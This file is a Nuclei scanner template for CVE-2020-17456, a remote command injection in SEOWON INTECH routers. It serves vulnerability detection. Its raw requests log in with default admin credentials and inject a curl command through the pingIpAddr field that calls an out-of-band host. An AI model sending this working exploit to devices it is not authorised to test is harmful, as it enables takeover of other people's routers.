nuclei-templates/http/cves/2020/CVE-2020-17456.yaml

71 lines
2.7 KiB
YAML

id: CVE-2020-17456
info:
name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution
author: gy741,edoardottt
severity: critical
description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
remediation: |
Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
reference:
- https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/
- https://nvd.nist.gov/vuln/detail/CVE-2020-17456
- http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html
- https://www.exploit-db.com/exploits/50821
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-17456
cwe-id: CWE-78
epss-score: 0.96253
epss-percentile: 0.99525
cpe: cpe:2.3:h:seowonintech:slc-130:-:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: seowonintech
product: slc-130
tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech
variables:
useragent: '{{rand_base(6)}}'
http:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
browserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin
- |
POST /cgi-bin/system_log.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: {{useragent}}"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100b401c220355e120416b45265ecc5dd5655e000c24e193ecfe986474c671bbb89022100d92a22399dddb6b554da7dfe080987ef24df925d38a5fa5c0c5a46256b5d6776:922c64590222798bb761d5b6d8e72950